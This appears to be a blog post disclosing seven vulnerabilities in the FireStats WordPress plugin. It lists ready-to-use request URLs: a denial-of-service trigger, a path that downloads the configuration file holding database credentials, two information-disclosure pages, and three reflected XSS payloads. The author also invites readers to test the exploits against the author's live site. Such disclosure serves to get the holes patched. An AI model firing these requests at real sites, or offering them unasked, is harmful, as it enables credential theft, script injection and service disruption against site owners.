I just tried to find more security leaks in the firestats plugin, I was specifically searching for remotely exploitable problems.

The results are 7 fresh security issues.

1x DoS:

/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1

1x remotely downloadable configuration file; this may contain the database information (username, password, name, prefix, host).

/wp-content/plugins/firestats/php/tools/get_config.php

2x Information disclosue:

/wp-content/plugins/firestats/php/page-sites.php
/wp-content/plugins/firestats/php/page-tools.php

3x XSS:

/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=

Let’s hope they patch soon because we are running Firestats too, the previous fix came very fast so I assume they will fix it this time fast too.
Oh and feel free to test the exploits against this site (but don’t try out the DoS please).

Good luck Firestats team with fixing these vulnerabilities!